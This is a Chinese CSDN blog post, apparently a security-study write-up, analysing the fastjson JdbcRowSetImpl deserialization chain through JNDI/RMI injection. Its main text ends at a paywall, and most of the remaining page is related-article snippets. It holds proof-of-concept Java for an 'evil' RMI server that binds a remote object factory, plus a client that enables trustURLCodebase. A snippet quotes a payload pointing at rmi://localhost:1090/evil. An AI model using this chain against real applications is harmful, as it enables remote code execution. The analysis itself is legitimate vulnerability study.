fastjson反序列化JdbcRowSetImpl链

最新推荐文章于 2024-03-03 15:14:04 发布
最新推荐文章于 2024-03-03 15:14:04 发布
阅读量391 收藏
点赞数
分类专栏: Java安全 文章标签: java 反序列化 fastjson templateImpl
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40710190/article/details/125686354
版权

fastjson反序列化JdbcRowSetImpl链

这里开始需要JNDIRMI的知识了Java之RMI和JNDI

从上面的文章知道了InitialContext.lookup(String name)是检索命名对象,先从InitialContext.lookup(String name)开始分析,之后再从JdbcRowSetImpl分析。

先放Poc的链接

RMI服务端

启动服务端

public class RMIServer {
   

    public static void main(String argv[]) {
   

        try {
   
            Registry  registry =  LocateRegistry.createRegistry(1099);

            //如果通过rmi无法找到org.lain.poc.jndi.EvilObjectFactory,则尝试从factoryLocation 获取
            //因此,本地测试的话,如果factory正确,factoryLocation随便填写
            Reference reference = new Reference("EvilObject",
                    "org.lain.poc.jndi.EvilObjectFactory",
                    "http://localhost:9999/" );


            //客户端通过evil查找,获取到EvilObject
            registry.bind("evil", new ReferenceWrapper(reference));

            System.out.println("Ready!");
            System.out.println("Waiting for connection......");

        } catch (Exception e) {
   
            System.out.println("RMIServer: " + e.getMessage());
            e.printStackTrace();
        }
    }
}

客户端

启动客户端在lookup(String name)打断点

public class Client {
   

    public static void main(String[] args) throws NamingException {
   

        /*初始化*/
        Hashtable env = new Hashtable();
        env.put(Context.INITIAL_CONTEXT_FACTORY,
                "com.sun.jndi.rmi.registry.RegistryContextFactory");
        env.put(Context.PROVIDER_URL, "rmi://localhost:1099");//localhost
        //env.put(Context.PROVIDER_URL, "rmi://xx.xx.xx.xx:1090");//remote

        /*JDK1.8xx trustURLCodebase默认是false*/
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");

        Context ctx = new InitialContext(env);

        System.out.println(ctx.lookup("evil"));
    }
}

InitialContext

首先进入的是lookup(String name)

//InitialContext.java
public Object lookup(String name) throws NamingException {
   
    return getURLOrDefaultInitCtx(name).lookup(name);
}

顾名思义getURLOrDefaultInitCtx是拿到URLCtx,跟lookup(name)

//RegistryContext.java
public Object lookup(String var1) throws NamingException {
   
    return this.lookup((Name)(new CompositeName(var1)));
}

public Object lookup(Name var1) throws NamingException {
   
    if (var1.isEmpty()) {
   
        return new RegistryContext(this);
    } else {
   
        Remote var2;
        try {
   
            var2 = this.registry.lookup(var1.get(0)); //继续跟进来
        } catch
最低0.47元/天 解锁文章
小莫神和他的的
关注
专栏目录
FastJson JdbcRowSetImpl 分析
Vicl1fe的博客
07-17 665
前言 继续跟着大佬学习fastjson利用。之前写了fastjson TemplateImple利用。里面分析了fastjson的一些数据流向。 对于JdbcRowSetImpl。这个基本没啥限制条件,只需要Json.parse(input)即可进行命令执行。 环境 jdk1.8_102 <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</arti
Java-Fastjson 反序列化
The current road is different, love needs to distinguish between right and wrong
02-28 5190
简介 以bugku的一道题为例: ctf.bugku Java Fastjson 漏洞验证 使用python脚本测试一下漏洞存在。 环境搭建 这里我使用RMI服务进行漏洞利用,所以先搭建Java rmi服务,因为不是在本地测试,这里是在公网服务器上搭建的。 下载一个marshalsec git clone https://github.com/mbechler/marshalsec 新建一个用于执行命令的java类文件 vi fastjson.java
FastJson<=1.2.24 JdbcRowSetImpl利用分析
weixin_45682070的博客
12-29 3366
前言 上文分析了TemplatesImpl利用,对fastjson parseObject函数进行了分析,明白了整个触发漏洞的流程,接着来学习JdbcRowSetImpl 利用JdbcRowSetImpl的利用在实际运用中较为广泛,这个基本没啥限制条件,只需要Json.parse(input)即可进行命令执行。这条主要利用了setAutoCommit方法调用InitialContext.lookup并且参数是未经过滤dataSourceName,导致JNDI注入,造成命令执行。其中涉及了JDNI
Fastjson JdbcRowSetImpl利用学习
虚幻私塾
04-15 1458
Python微信订餐小程序课程视频 https://blog.csdn.net/m0_56069948/article/details/122285951 Python实战量化交易理财系统 https://blog.csdn.net/m0_56069948/article/details/122285941 JdbcRowSetImpl 接着继续学习fastjson的第二条JdbcRowSetImpl,主要是利用jndi注入达到的攻击,而且没有什么利用限制,而且其原理就是setter的自动调用,具体set
fastjson反序列化JdbcRowSetImpl
weixin_30596735的博客
12-28 409
Gadget com.sun.rowset.JdbcRowSetImpl setAutoCommit() -> connect() -> InitialContext.lookup() poc如下,dataSourceName 为rmi://localhost:1090/evil: String payload = "{\"@type\":\"Lcom.s...
Fastjson 反序列化 Jndi 注入利用 JdbcRowSetImpl
Love&Share
02-26 5468
文章目录Fastjson 反序列化Fastjson 组件使用案例漏洞原理Jndi注入利用JdbcRowSetImpl原理复现调试高级利用-推荐阅读Fastjson姿势技巧fastjson检测参考文章 Fastjson 反序列化 Fastjson 组件是阿里巴巴开发的反序列化与序列化组件 Fastjson组件在反序列化不可信数据时会导致远程代码执行。究其原因: Fastjson 提供了反序列化功能,允许用户在输入 JSON 串时通过 “@type” 键对应的 value 指定任意反序列化类名 Fastj.
fastjson反序列化利用
Jiajiajiang_的博客
11-27 3596
这是对fastjson反序列化的一次利用,关键信息会进行打码处理,且对方此漏洞已修复。 首先确定下是否使用了fastjson 在使用了json传数据的地方,尝试用一些特殊符号打算json的结构,使程序报错。 我们尝试利用fastjson的漏洞 参考及需要文件下载:https://github.com/CaijiOrz/fastjson-1.2.47-RCE/ 将下载好的其中一...
FastJson反序列化
Finlinlts的博客
08-30 3694
Fastjson允许用户在输入JSON串时通过“@type”键对应的value指定任意反序列化类名。Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用
fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
薛定谔嘚喵博客
05-30 1199
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,的作用就是把java对象转换为json形式,也可 以用来将json转换为java对象。fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用
fastjson1.2.24反序列化漏洞复现,验证JdbcRowSetImpl
liu649983697的专栏
05-30 1566
fastjson反序列化漏洞复现、实验、验证,远程命令调用、漏洞攻击
JAVA详细思路|Java安全之FastJson JdbcRowSetImpl 分析
m0_57227221的博客
05-17 1092
Java安全之FastJson JdbcRowSetImpl 分析 0x00 前言 这一次我们来学习 JdbcRowSetImpl 利用JdbcRowSetImpl 的利用在实际运用中较为广泛,这个基本没啥限制条件,只需要 Json.parse(input) 即可进行命令执行。 0x01 漏洞分析 利用限制 首先来说说限制,基于JNDI+RMI或JDNI+LADP进行攻击,会有一定的JDK版本限制。 RMI利用的JDK版本≤ JDK 6u132、7u122、8u113 LADP利用JDK版本≤
fastjson反序列化漏洞_fastjson结合JdbcRowSetImpl反序列化利用理解
weixin_39783156的博客
11-28 482
前言最近看到网上有新出的fastjson反序列化利用,就好奇的琢磨了一下,查了一些资料然后整理出来,有不正确的地方还望指正。反序列化的利用本质:找到一条有效的攻击,攻击的末端就是有代码执行能力的类,来达到我们想做的事情,一般都是用来RCE(远程命令执行)。构造一个触发器,也就是通过什么方式来让攻击执行你想要的代码。触发器可以通过很多方式,比如静态代码块、构造方法等等。fastjson是阿里巴...
【Web】速谈FastJson反序列化JdbcRowSetImpl的利用
最新发布
uuzeray的博客
03-03 721
继续看connect方法,显然conn为空且我们有DataSourceName属性,进到else if的分支,调用(new InitialContext()).lookup(),经典何须多言,只要dataSourceName设为恶意远程RMI服务或LDAP服务打JNDI即可。fastjson的第二条JdbcRowSetImpl,主要是利用jndi注入达到的攻击,而且没有什么利用限制,其原理就是setter的自动调用。开一个恶意LDAP服务器。找个端口放恶意字节码。
14-java安全——fastjson1.2.24反序列化JdbcRowSetImpl利用分析
网络安全
09-01 802
fastjson在1.2.24版本中,除了TemplatesImpl之外,还有一个JdbcRowSetImpl利用JdbcRowSetImpl有两种利用方式:一种是RMI和JNDI利用方式,另一种是JNDI和LDAP利用方式,关于JNDI的相关概念之前在java安全基础中已经介绍过了,而且底层原理已经分析过了,大家可自行参考以下文章。 4-java安全基础——RMI远程调用 5-java安全基础——RMI和JNDI实现漏洞利用 6-java安全基础——JNDI和LDAP利用 1. RMI
java安全学习笔记--fastjson1.2.24反序列化漏洞两种利用分析(TemplatesImpl,JdbcRowSetImpl
m0_64685672的博客
02-03 2831
测试环境 jdk1.7 fastjson 1.2.24 Fastjson简介及用法 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,常用在前后端分离的项目中,用来处理前端传来的json数据,JSON字符串和Java对象的转换就是基于序列化和反序列化来实现的。 演示代码: package com.test; import com.alibaba.fastjson.JSON;
JAVA反序列化学习5】fastjson反序列化JdbcRowSetImpl类JNDI注入分析
GX233的博客
06-01 924
fastjson反序列化JdbcRowSetImpl类JNDI注入
1.2.24 Fastjson反序列化TemplatesImplJdbcRowSetImpl利用分析(非常详细)
dreamthe的博客
07-07 2300
本文的关于Fastjson1.2.24版本TemplatesImpl利用的分析非常详细,如果你不是很熟悉该利用,这篇文章非常适合你去学习,有比较详细的代码讲解。但是由于本人不是专业学习java的,只能以自己的理解去理解代码。应该不会差太多。有不懂可以评论区留言。...............
Java反序列化6-Fastjson JdbcRowSetImpl 及后续漏洞分析
weixin_43263451的博客
07-18 1541
上一节讲了TemplatesImpl的利用方式,但是呢其局限性较大需要后端开启Feature.SupportNonPublicField且因为Feature.SupportNonPublicField是在fastjson1.2.22版本才引入所以只影响1.2.22-1.2.24版本fastjson这里的JdbcRowSetImplTemplatesImpl利用范围更大一点后面版本的fastjson漏洞都是在绕过黑名单,所以在本文中一次全部陈述总结前言.前言.前言。............
fastjson反序列化漏洞原理
05-20
漏洞的原理主要是由于fastjson反序列化时,会根据JSON数据中的"type"字段进行类的反射处理,从而实例化对象。攻击者可以通过恶意构造的JSON数据,修改"type"字段的值,使得fastjson反序列化时实例化的对象为攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值